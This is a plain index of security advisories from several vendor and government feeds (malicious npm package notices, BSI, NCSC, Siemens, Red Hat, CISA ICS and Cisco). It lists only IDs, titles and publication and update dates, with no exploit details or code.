mal-2024-1285	Malicious code in djs-embeds-v2 (npm)	2024-04-22T06:18:24Z	2024-04-22T06:18:29Z
mal-2024-1284	Malicious code in discord-caches (npm)	2024-04-22T06:18:24Z	2024-04-22T06:18:29Z
mal-2024-1296	Malicious code in waveapi (npm)	2024-04-22T06:18:23Z	2024-04-22T06:18:24Z
mal-2024-1290	Malicious code in samplenodejsservice (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:33Z
mal-2024-1281	Malicious code in arkime (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:33Z
mal-2024-1288	Malicious code in lambda-iss-location (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:29Z
mal-2024-1282	Malicious code in blockchain-explorer-api (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:29Z
mal-2024-1294	Malicious code in tari-explorer (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:28Z
mal-2024-1289	Malicious code in monitoring-coverage (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:28Z
mal-2024-1292	Malicious code in sid-client-manager (npm)	2024-04-22T06:08:13Z	2024-04-22T06:08:18Z
mal-2024-1279	Malicious code in djs-log (npm)	2024-04-19T06:26:19Z	2024-04-19T06:26:20Z
mal-2024-1278	Malicious code in somepackage-marksl (npm)	2024-04-18T07:28:45Z	2024-04-18T07:28:46Z
mal-2024-1277	Malicious code in malpac (npm)	2024-04-18T07:28:46Z	2024-04-18T07:28:46Z
mal-2024-1272	Malicious code in @portal-packages/core (npm)	2024-04-17T01:45:53Z	2024-04-18T04:33:54Z
mal-2024-1274	Malicious code in ui-common-components-angular (npm)	2024-04-18T01:15:48Z	2024-04-18T01:15:48Z
mal-2024-1273	Malicious code in metrics-balancer (npm)	2024-04-17T19:28:56Z	2024-04-17T19:28:56Z
mal-2024-1275	Malicious code in @portal-packages/utils (npm)	2024-04-17T01:50:45Z	2024-04-17T01:50:45Z
mal-2024-1276	Malicious code in cz-ifood-conventional-changelog (npm)	2024-04-17T00:00:50Z	2024-04-17T00:00:50Z
mal-2024-1267	Malicious code in commitlint-config-ifood (npm)	2024-04-16T21:55:10Z	2024-04-16T21:55:10Z
mal-2024-1271	Malicious code in web-ar-player (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:29Z
mal-2024-1269	Malicious code in hosted-lenses-ui (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:29Z
mal-2024-1270	Malicious code in snap-orca (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:28Z
mal-2024-1268	Malicious code in bluepurellwalker (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:28Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
wid-sec-w-2025-1480	Red Hat Enterprise Linux (jq): Mehrere Schwachstellen ermöglichen Denial of Service	2025-07-07T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1466	Red Hat Enterprise Linux (socat): Schwachstelle ermöglicht Manipulation von Dateien	2025-07-06T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1451	Drupal: Mehrere Schwachstellen ermöglichen Umgehen von Sicherheitsvorkehrungen	2025-07-02T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1430	Linux Kernel: Mehrere Schwachstellen	2025-06-30T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1428	sudo: Mehrere Schwachstellen	2025-06-30T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1413	Red Hat OpenShift Container Platform: Schwachstelle ermöglicht Denial of Service und Offenlegung	2025-06-26T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1389	Podman: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen	2025-06-24T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1372	Linux Kernel: Schwachstelle ermöglicht Manipulation von Daten und Denial of Service	2025-06-22T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1371	FreeRDP: Schwachstelle ermöglicht Denial of Service	2025-06-22T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1350	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service	2025-06-17T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1312	libxml2: Mehrere Schwachstellen ermöglichen Denial of Service	2025-06-11T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1279	Broadcom Fabric OS: Mehrere Schwachstellen	2025-06-10T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1270	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service	2025-06-09T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1245	Django: Schwachstelle ermöglicht Manipulation von Dateien	2025-06-04T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1205	Golang Go: Mehrere Schwachstellen	2025-06-01T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1204	systemd-coredump: Schwachstelle ermöglicht Offenlegung von Informationen	2025-06-01T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1201	Linux Kernel: Mehrere Schwachstellen	2025-05-29T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1145	Linux Kernel: Schwachstelle ermöglicht Denial of Service	2025-05-26T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1134	Ghostscript: Schwachstelle ermöglicht Offenlegung von Informationen	2025-05-22T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1114	Linux Kernel: Mehrere Schwachstellen	2025-05-20T22:00:00.000+00:00	2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1467	Ruby on Rails: Mehrere Schwachstellen	2019-03-13T23:00:00.000+00:00	2025-07-07T22:00:00.000+00:00
wid-sec-w-2023-1042	Ruby: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen	2023-04-19T22:00:00.000+00:00	2025-07-06T22:00:00.000+00:00
wid-sec-w-2025-1455	F5 BIG-IP: Mehrere Schwachstellen	2019-05-23T22:00:00.000+00:00	2025-07-03T22:00:00.000+00:00
wid-sec-w-2025-1436	Google Chrome / Microsoft Edge: Schwachstelle ermöglicht Codeausführung	2025-06-30T22:00:00.000+00:00	2025-07-02T22:00:00.000+00:00
wid-sec-w-2025-1397	Google Chrome / Microsoft Edge: Mehrere Schwachstellen	2025-06-24T22:00:00.000+00:00	2025-06-30T22:00:00.000+00:00
wid-sec-w-2025-1130	Microsoft Edge: Schwachstelle ermöglicht Privilegieneskalation	2025-05-22T22:00:00.000+00:00	2025-06-29T22:00:00.000+00:00
wid-sec-w-2025-1407	McAfee Agent: Mehrere Schwachstellen	2022-04-13T22:00:00.000+00:00	2025-06-26T22:00:00.000+00:00
wid-sec-w-2025-1395	Mozilla Firefox: Mehrere Schwachstellen	2025-06-24T22:00:00.000+00:00	2025-06-25T22:00:00.000+00:00
wid-sec-w-2025-1393	Red Hat Enterprise Linux: Schwachstelle ermöglicht Codeausführung	2025-06-24T22:00:00.000+00:00	2025-06-25T22:00:00.000+00:00
wid-sec-w-2025-1378	Red Hat Enterprise Linux (mod_proxy_cluster): Schwachstelle ermöglicht Manipulation von Daten	2025-06-23T22:00:00.000+00:00	2025-06-25T22:00:00.000+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
ncsc-2025-0224	Kwetsbaarheden verholpen in Adobe Illustrator	2025-07-09T08:57:08.548822Z	2025-07-09T08:57:08.548822Z
ncsc-2025-0223	Kwetsbaarheden verholpen in Adobe Framemaker	2025-07-09T08:47:38.891072Z	2025-07-09T08:47:38.891072Z
ncsc-2025-0222	Kwetsbaarheden verholpen in Adobe ColdFusion	2025-07-09T08:41:53.656736Z	2025-07-09T08:41:53.656736Z
ncsc-2025-0221	Kwetsbaarheden verholpen in Schneider Electric EcoStruxture IT Datacenter Expert	2025-07-09T08:38:05.336146Z	2025-07-09T08:38:05.336146Z
ncsc-2025-0220	Kwetsbaarheden verholpen in Palo Alto PAN-OS	2025-07-09T08:33:14.284978Z	2025-07-09T08:33:14.284978Z
ncsc-2025-0219	Kwetsbaarheden verholpen in SAP producten	2025-07-09T08:29:00.474865Z	2025-07-09T08:29:00.474865Z
ncsc-2025-0218	Kwetsbaarheden verholpen in Microsoft Edge (Chromium based)	2025-07-08T18:26:55.812717Z	2025-07-08T18:26:55.812717Z
ncsc-2025-0217	Kwetsbaarheden verholpen in Microsoft Visual Studio	2025-07-08T18:26:14.881161Z	2025-07-08T18:26:14.881161Z
ncsc-2025-0216	Kwetsbaarheden verholpen in Microsoft SQL Server	2025-07-08T18:25:40.909948Z	2025-07-08T18:25:40.909948Z
ncsc-2025-0215	Kwetsbaarheden verholpen in Microsoft Office	2025-07-08T18:24:48.517158Z	2025-07-08T18:24:48.517158Z
ncsc-2025-0214	Kwetsbaarheden verholpen in Microsoft Azure	2025-07-08T18:24:14.065296Z	2025-07-08T18:24:14.065296Z
ncsc-2025-0213	Kwetsbaarheden verholpen in Microsoft Windows	2025-07-08T18:23:09.960791Z	2025-07-08T18:23:09.960791Z
ncsc-2025-0212	Kwetsbaarheden verholpen in Splunk Enterprise en Splunk Cloud Platform	2025-07-08T12:03:17.100858Z	2025-07-08T12:03:17.100858Z
ncsc-2025-0211	Kwetsbaarheden verholpen in Siemens producten	2025-07-08T11:58:23.712452Z	2025-07-08T11:58:23.712452Z
ncsc-2025-0196	Kwetsbaarheden verholpen in Citrix NetScaler ADC en NetScaler Gateway	2025-06-18T08:32:32.792202Z	2025-07-08T08:02:17.923874Z
ncsc-2025-0210	Kwetsbaarheid verholpen in Cisco Unified Communications Manager	2025-07-03T07:43:27.075341Z	2025-07-03T07:43:27.075341Z
ncsc-2025-0209	Kwetsbaarheid verholpen in Google Chrome	2025-07-01T15:56:24.236216Z	2025-07-01T15:56:24.236216Z
ncsc-2025-0208	Kwetsbaarheden verholpen in Adobe Commerce	2025-06-30T12:59:12.105658Z	2025-06-30T12:59:12.105658Z
ncsc-2025-0207	Kwetsbaarheden verholpen in Adobe InDesign Desktop	2025-06-30T12:58:32.421661Z	2025-06-30T12:58:32.421661Z
ncsc-2025-0206	Kwetsbaarheden verholpen in Adobe Acrobat Reader	2025-06-30T12:57:43.622242Z	2025-06-30T12:57:43.622242Z
ncsc-2025-0205	Kwetsbaarheid verholpen in IBM WebSphere Application Server	2025-06-26T12:32:54.177712Z	2025-06-26T12:32:54.177712Z
ncsc-2025-0204	Kwetsbaarheden verholpen in Cisco ISE en ISE-PIC	2025-06-26T09:02:07.224036Z	2025-06-26T09:02:07.224036Z
ncsc-2025-0203	Kwetsbaarheid verholpen in Citrix NetScaler ADC en NetScaler Gateway	2025-06-25T14:54:38.413413Z	2025-06-25T14:54:38.413413Z
ncsc-2025-0202	Kwetsbaarheden verholpen in IBM InfoSphere Information Server	2025-06-22T08:19:47.485567Z	2025-06-22T08:19:47.485567Z
ncsc-2025-0201	Kwetsbaarheid verholpen in IBM Spectrum Protect Server	2025-06-22T08:17:03.146698Z	2025-06-22T08:17:03.146698Z
ncsc-2025-0200	Kwetsbaarheden verholpen in IBM QRadar SIEM	2025-06-20T11:04:50.445218Z	2025-06-20T11:04:50.445218Z
ncsc-2025-0199	Kwetsbaarheid verholpen in Cisco AnyConnect VPN voor Meraki MX en Z	2025-06-19T08:42:22.673078Z	2025-06-19T08:42:22.673078Z
ncsc-2025-0198	Kwetsbaarheden verholpen in Veeam Backup	2025-06-18T12:18:39.049977Z	2025-06-18T12:18:39.049977Z
ncsc-2025-0197	Kwetsbaarheid verholpen in GeoServer	2025-06-18T10:17:42.472544Z	2025-06-18T10:17:42.472544Z
ncsc-2025-0195	Kwetsbaarheden verholpen in Apache Tomcat	2025-06-18T08:01:06.984131Z	2025-06-18T08:01:06.984131Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
ssa-938066	SSA-938066: Remote Code Execution Vulnerability in SENTRON Powermanager and Desigo CC	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-904646	SSA-904646: Sensitive Data Exposure Vulnerability in SIPROTEC 5 Devices	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-876787	SSA-876787: Open Redirect Vulnerability in SIMATIC S7-1500 and S7-1200 CPUs	2024-10-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-864900	SSA-864900: Multiple Vulnerabilities in Fortigate NGFW on RUGGEDCOM APE1808 Devices	2025-05-13T00:00:00Z	2025-07-08T00:00:00Z
ssa-770770	SSA-770770: Multiple Vulnerabilities in Fortigate NGFW Before V7.4.7 on RUGGEDCOM APE1808 Devices	2025-02-11T00:00:00Z	2025-07-08T00:00:00Z
ssa-763427	SSA-763427: Authentication Bypass Vulnerability in SIMATIC CP and TIM Devices	2015-11-27T00:00:00Z	2025-07-08T00:00:00Z
ssa-725549	SSA-725549: Denial of Service of ICMP in Industrial Devices	2025-04-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-723487	SSA-723487: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SCALANCE, RUGGEDCOM and Related Products	2024-07-09T00:00:00Z	2025-07-08T00:00:00Z
ssa-698820	SSA-698820: Multiple Vulnerabilities in Fortigate NGFW Before V7.4.4 on RUGGEDCOM APE1808 Devices	2024-07-09T00:00:00Z	2025-07-08T00:00:00Z
ssa-634640	SSA-634640: Weak Authentication Vulnerability in Siemens Industrial Edge Devices	2025-04-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-627195	SSA-627195: Zip Path Traversal Vulnerability in Mendix Studio Pro's Module Installation Process	2025-06-12T00:00:00Z	2025-07-08T00:00:00Z
ssa-626991	SSA-626991: Denial of Service Vulnerability in SIMATIC CN 4100 before V4.0	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-614723	SSA-614723: Denial of Service Vulnerabilities in User Management Component (UMC)	2025-05-13T00:00:00Z	2025-07-08T00:00:00Z
ssa-593272	SSA-593272: SegmentSmack in Interniche IP-Stack based Industrial Devices	2020-04-14T00:00:00Z	2025-07-08T00:00:00Z
ssa-573669	SSA-573669: Multiple Vulnerabilities in TIA Administrator Before V3.0.6	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-513708	SSA-513708: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices	2025-06-10T00:00:00Z	2025-07-08T00:00:00Z
ssa-460466	SSA-460466: Denial of Service Vulnerability in TIA Project-Server and TIA Portal	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-446545	SSA-446545: Impact of RegreSSHion (CVE-2024-6387) in Siemens Industrial Products	2024-09-10T00:00:00Z	2025-07-08T00:00:00Z
ssa-366067	SSA-366067: Multiple Vulnerabilities in Fortigate NGFW Before V7.4.1 on RUGGEDCOM APE1808 Devices	2024-03-12T00:00:00Z	2025-07-08T00:00:00Z
ssa-364175	SSA-364175: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices Before V11.1.4-h1	2024-07-09T00:00:00Z	2025-07-08T00:00:00Z
ssa-327438	SSA-327438: Multiple Vulnerabilities in SCALANCE LPE9403	2025-05-13T00:00:00Z	2025-07-08T00:00:00Z
ssa-265688	SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1	2024-04-09T00:00:00Z	2025-07-08T00:00:00Z
ssa-183963	SSA-183963: Certificate Validation Vulnerabilities in SICAM TOOLBOX II Before V07.11	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-091753	SSA-091753: Multiple Vulnerabilities in Solid Edge Before SE2025 Update 5	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-083019	SSA-083019: Multiple Vulnerabilities in RUGGEDCOM ROS Devices	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-078892	SSA-078892: Multiple Vulnerabilities in SINEC NMS Before V4.0	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
ssa-426509	SSA-426509: Multiple Local Code Execution Vulnerabilities in Questa and ModelSim	2024-10-08T00:00:00Z	2025-06-17T00:00:00Z
ssa-345750	SSA-345750: Default Credentials in Energy Services Using Elspec G5DFR	2025-06-10T00:00:00Z	2025-06-16T00:00:00Z
ssa-726617	SSA-726617: Incorrect Privilege Assignment Vulnerability in Mendix OIDC SSO Module	2025-05-13T00:00:00Z	2025-06-12T00:00:00Z
ssa-928984	SSA-928984: Heap-based Buffer Overflow Vulnerability in User Management Component (UMC)	2024-12-16T00:00:00Z	2025-06-10T00:00:00Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
rhsa-2023:7699	Red Hat Security Advisory: Red Hat OpenShift Pipelines Client tkn for 1.10.6 release and security update	2023-12-07T14:26:32+00:00	2025-07-09T21:24:23+00:00
rhsa-2023:6788	Red Hat Security Advisory: Red Hat OpenShift GitOps security update	2023-11-08T02:05:06+00:00	2025-07-09T21:24:22+00:00
rhsa-2023:6836	Red Hat Security Advisory: OpenShift Container Platform 4.14.2 security and extras update	2023-11-15T00:47:45+00:00	2025-07-09T21:24:21+00:00
rhsa-2023:7344	Red Hat Security Advisory: openshift-gitops-kam security update	2023-11-20T07:53:42+00:00	2025-07-09T21:24:19+00:00
rhsa-2023:6846	Red Hat Security Advisory: OpenShift Container Platform 4.13.22 bug fix and security update	2023-11-15T01:45:54+00:00	2025-07-09T21:24:18+00:00
rhsa-2023:7515	Red Hat Security Advisory: Red Hat OpenShift for Windows Containers 9.0.0 security update	2023-11-27T16:08:33+00:00	2025-07-09T21:24:14+00:00
rhsa-2023:6845	Red Hat Security Advisory: OpenShift Container Platform 4.13.22 security and extras update	2023-11-15T00:43:04+00:00	2025-07-09T21:24:10+00:00
rhsa-2023:7342	Red Hat Security Advisory: OpenShift Container Platform 4.11 low-latency extras update	2023-11-16T20:48:36+00:00	2025-07-09T21:24:09+00:00
rhsa-2023:7215	Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.2.12	2023-11-15T00:16:31+00:00	2025-07-09T21:24:08+00:00
rhsa-2023:6787	Red Hat Security Advisory: Network Observability security update	2023-11-08T01:54:46+00:00	2025-07-09T21:24:07+00:00
rhsa-2023:6837	Red Hat Security Advisory: OpenShift Container Platform 4.14.2 bug fix and security update	2023-11-15T04:22:30+00:00	2025-07-09T21:23:58+00:00
rhsa-2023:6784	Red Hat Security Advisory: Node Health Check Operator 0.6.1 security update	2023-11-08T01:27:34+00:00	2025-07-09T21:23:56+00:00
rhsa-2023:6786	Red Hat Security Advisory: Fence Agents Remediation Operator 0.2.1 security update	2023-11-08T01:46:23+00:00	2025-07-09T21:23:46+00:00
rhsa-2023:6785	Red Hat Security Advisory: Machine Deletion Remediation Operator 0.2.1 security update	2023-11-08T01:37:29+00:00	2025-07-09T21:23:35+00:00
rhsa-2023:6279	Red Hat Security Advisory: cert-manager Operator for Red Hat OpenShift 1.11.5	2023-11-15T01:08:30+00:00	2025-07-09T21:23:32+00:00
rhsa-2023:6779	Red Hat Security Advisory: Red Hat OpenShift Pipelines Operator security update	2023-11-08T00:57:26+00:00	2025-07-09T21:23:25+00:00
rhsa-2023:6269	Red Hat Security Advisory: cert-manager Operator for Red Hat OpenShift 1.12.1	2023-11-15T03:12:52+00:00	2025-07-09T21:23:22+00:00
rhsa-2023:6818	Red Hat Security Advisory: Satellite 6.14 security and bug fix update	2023-11-08T14:26:58+00:00	2025-07-09T21:23:19+00:00
rhsa-2023:6783	Red Hat Security Advisory: Node Health Check Operator 0.4.1	2023-11-08T01:18:25+00:00	2025-07-09T21:23:16+00:00
rhsa-2023:6154	Red Hat Security Advisory: Secondary Scheduler Operator for Red Hat OpenShift 1.2.0	2023-11-01T00:30:41+00:00	2025-07-09T21:23:16+00:00
rhsa-2023:6272	Red Hat Security Advisory: OpenShift Container Platform 4.11.53 bug fix and security update	2023-11-08T10:41:09+00:00	2025-07-09T21:23:10+00:00
rhsa-2023:6126	Red Hat Security Advisory: OpenShift Container Platform 4.12.41 bug fix and security update	2023-11-01T11:07:20+00:00	2025-07-09T21:23:10+00:00
rhsa-2023:6832	Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.14.0 security, enhancement & bug fix update	2023-11-08T18:49:17+00:00	2025-07-09T21:23:09+00:00
rhsa-2023:6782	Red Hat Security Advisory: openshift-gitops-kam security update	2023-11-08T01:10:45+00:00	2025-07-09T21:23:06+00:00
rhsa-2023:6257	Red Hat Security Advisory: OpenShift Container Platform 4.13.21 bug fix and security update	2023-11-08T08:43:21+00:00	2025-07-09T21:23:06+00:00
rhsa-2023:6202	Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.8 security and bug fix updates	2023-10-30T20:13:48+00:00	2025-07-09T21:23:06+00:00
rhsa-2023:6115	Red Hat Security Advisory: OpenShift API for Data Protection security update	2023-10-25T14:01:58+00:00	2025-07-09T21:23:06+00:00
rhsa-2023:6125	Red Hat Security Advisory: OpenShift Container Platform 4.12.41 security and extras update	2023-11-01T10:27:35+00:00	2025-07-09T21:23:00+00:00
rhsa-2023:6828	Red Hat Security Advisory: ACS 4.1 enhancement update	2023-11-08T18:34:59+00:00	2025-07-09T21:22:58+00:00
rhsa-2023:6276	Red Hat Security Advisory: OpenShift Container Platform 4.12.42 bug fix and security update	2023-11-08T10:40:48+00:00	2025-07-09T21:22:58+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
icsa-25-189-01	Emerson ValveLink Products	2025-07-08T06:00:00.000000Z	2025-07-08T06:00:00.000000Z
icsa-25-184-04	Mitsubishi Electric MELSEC iQ-F Series	2025-07-03T06:00:00.000000Z	2025-07-03T06:00:00.000000Z
icsa-25-184-03	Mitsubishi Electric MELSOFT Update Manager	2025-07-03T06:00:00.000000Z	2025-07-03T06:00:00.000000Z
icsa-25-184-02	Hitachi Energy MicroSCADA X SYS600	2025-07-03T06:00:00.000000Z	2025-07-03T06:00:00.000000Z
va-25-169-01	Versa Networks Versa Director multiple vulnerabilities	2025-07-02T20:57:00Z	2025-07-02T20:57:00Z
icsa-25-182-05	Voltronic Power and PowerShield UPS monitoring software	2025-07-01T06:00:00.000000Z	2025-07-01T06:00:00.000000Z
icsa-16-306-02	IBHsoftec S7-SoftPLC CPX43 Heap-based Buffer Overflow Vulnerability	2016-08-05T06:00:00.000000Z	2025-06-26T14:48:20.911473Z
icsa-16-287-07a	Kabona AB WDC Vulnerabilities (Update A)	2016-07-17T06:00:00.000000Z	2025-06-26T14:47:55.479923Z
icsa-25-177-01	Mitsubishi Electric Air Conditioning Systems	2025-06-26T06:00:00.000000Z	2025-06-26T06:00:00.000000Z
icsa-25-177-02	TrendMakers Sight Bulb Pro	2025-06-26T05:00:00.000000Z	2025-06-26T05:00:00.000000Z
icsa-15-202-02	Siemens Sm@rtClient Password Storage Vulnerability	2015-04-23T06:00:00.000000Z	2025-06-25T22:54:14.268360Z
icsa-15-202-01	Siemens SIPROTEC Denial-of-Service Vulnerability	2015-04-23T06:00:00.000000Z	2025-06-25T22:54:08.041405Z
icsa-15-062-02	Rockwell Automation FactoryTalk DLL Hijacking Vulnerabilities	2015-12-04T07:00:00.000000Z	2025-06-25T22:54:01.269590Z
icsa-14-086-01a	Schneider Electric Serial Modbus Driver Buffer Overflow (Update A)	2014-12-28T07:00:00.000000Z	2025-06-25T22:09:32.885385Z
icsa-13-254-01	Siemens SCALANCE X-200 Web Hijack Vulnerability	2013-06-14T06:00:00.000000Z	2025-06-25T21:45:19.939275Z
icsa-13-140-01	Mitsubishi Electric Automation MX Component V3 ActiveX Vulnerability	2013-02-21T07:00:00.000000Z	2025-06-25T21:45:13.353340Z
icsa-12-256-01	Siemens WinCC WebNavigator Multiple Vulnerabilities	2012-06-16T06:00:00.000000Z	2025-06-25T18:57:28.717208Z
icsa-12-145-02	xArrow Multiple Vulnerabilities	2012-02-25T07:00:00.000000Z	2025-06-25T18:57:03.441531Z
icsa-11-122-01	AzeoTech DAQFactory Networking Vulnerabilities	2011-02-02T07:00:00.000000Z	2025-06-25T18:13:52.027870Z
icsa-16-231-01-0	Locus Energy LGate Command Injection Vulnerability	2016-05-22T06:00:00.000000Z	2025-06-25T18:13:45.800180Z
icsa-16-231-01	Navis WebAccess SQL Injection Vulnerability	2016-05-22T06:00:00.000000Z	2025-06-25T18:13:39.538321Z
icsa-16-208-01c	Siemens SIMATIC WinCC, PCS 7, and WinCC Runtime Professional Vulnerabilities (Update C)	2016-04-29T06:00:00.000000Z	2025-06-25T18:13:26.602224Z
icsa-16-189-01	WECON LeviStudio Buffer Overflow Vulnerabilities	2016-04-10T06:00:00.000000Z	2025-06-25T15:02:08.772345Z
icsa-15-335-02	Schneider Electric ProClima ActiveX Control Vulnerabilities	2015-09-03T06:00:00.000000Z	2025-06-25T15:02:02.107190Z
icsa-25-184-01	Hitachi Energy Relion 670/650 and SAM600-IO Series	2025-06-24T12:30:00.000000Z	2025-06-24T12:30:00.000000Z
icsa-25-182-07	Hitachi Energy MSM	2025-06-24T12:30:00.000000Z	2025-06-24T12:30:00.000000Z
icsa-25-182-06	Hitachi Energy Relion 670/650 and SAM600-IO Series	2025-06-24T12:30:00.000000Z	2025-06-24T12:30:00.000000Z
icsa-25-175-07	MICROSENS NMP Web+	2025-06-24T06:00:00.000000Z	2025-06-24T06:00:00.000000Z
icsa-25-175-06	Parsons AccuWeather widget	2025-06-24T06:00:00.000000Z	2025-06-24T06:00:00.000000Z
icsa-25-175-05	ControlID iDSecure On-premises	2025-06-24T06:00:00.000000Z	2025-06-24T06:00:00.000000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
cisco-sa-spaces-conn-privesc-kgd2ccdu	Cisco Spaces Connector Privilege Escalation Vulnerability	2025-07-02T16:00:00+00:00	2025-07-02T16:00:00+00:00
cisco-sa-ece-xss-cbtkteyc	Cisco Enterprise Chat and Email Stored Cross-Site Scripting Vulnerability	2025-07-02T16:00:00+00:00	2025-07-02T16:00:00+00:00
cisco-sa-cucm-ssh-m4ubdpe7	Cisco Unified Communications Manager Static SSH Credentials Vulnerability	2025-07-02T16:00:00+00:00	2025-07-02T16:00:00+00:00
cisco-sa-broadworks-xss-o696ymra	Cisco BroadWorks Application Delivery Platform Cross-Site Scripting Vulnerability	2025-07-02T16:00:00+00:00	2025-07-02T16:00:00+00:00
cisco-sa-ise-stored-xss-yff54m73	Cisco Identity Services Stored Cross-Site Scripting Vulnerability	2025-05-21T16:00:00+00:00	2025-06-30T15:08:59+00:00
cisco-sa-ise-unauth-rce-zad2gnj6	Cisco Identity Services Engine Unauthenticated Remote Code Execution Vulnerabilities	2025-06-25T16:00:00+00:00	2025-06-25T16:00:00+00:00
cisco-sa-ise-auth-bypass-mvfkvqau	Cisco Identity Services Engine Authorization Bypass Vulnerability	2025-06-25T16:00:00+00:00	2025-06-25T16:00:00+00:00
cisco-sa-ise-file-upload-p4m8vwxy	Cisco Identity Services Engine Arbitrary File Upload Vulnerability	2025-06-04T16:00:00+00:00	2025-06-23T19:16:21+00:00
cisco-sa-meraki-mx-vpn-dos-sm5gcfm7	Cisco Meraki MX and Z Series AnyConnect VPN with Client Certificate Authentication Denial of Service Vulnerability	2025-06-18T16:00:00+00:00	2025-06-18T16:00:00+00:00
cisco-sa-clamav-udf-hmwd9ndy	ClamAV UDF File Parsing Out-of-Bounds Read Information Disclosure Vulnerability	2025-06-18T16:00:00+00:00	2025-06-18T16:00:00+00:00
cisco-sa-erlang-otp-ssh-xyzzy	Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server: April 2025	2025-04-22T21:45:00+00:00	2025-06-11T14:40:37+00:00
cisco-sa-wlc-file-uplpd-rhzg9ufc	Cisco IOS XE Wireless Controller Software Arbitrary File Upload Vulnerability	2025-05-07T16:00:00+00:00	2025-06-06T20:02:48+00:00
cisco-sa-ise-aws-static-cred-fpmjucm7	Cisco Identity Services Engine on Cloud Platforms Static Credential Vulnerability	2025-06-04T16:00:00+00:00	2025-06-05T17:26:25+00:00
cisco-sa-vos-command-inject-65s2ucyy	Cisco Unified Communications Products Command Injection Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-ucs-ssh-priv-esc-2mzdtdjm	Cisco Integrated Management Controller Privilege Escalation Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-uccx-multi-uhotvpgl	Cisco Unified Contact Center Express Vulnerabilities	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-uccx-editor-rce-ezyyzte8	Cisco Unified Contact Center Express Editor Remote Code Execution Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-te-endagent-filewrt-zncdqnrj	Cisco ThousandEyes Endpoint Agent for Windows Arbitrary File Delete Vulnerabilities	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-ndfc-shkv-snqjtjrp	Cisco Nexus Dashboard Fabric Controller SSH Host Key Validation Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-icm-xss-cfcqhxag	Cisco Unified Intelligent Contact Management Enterprise Cross-Site Scripting Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
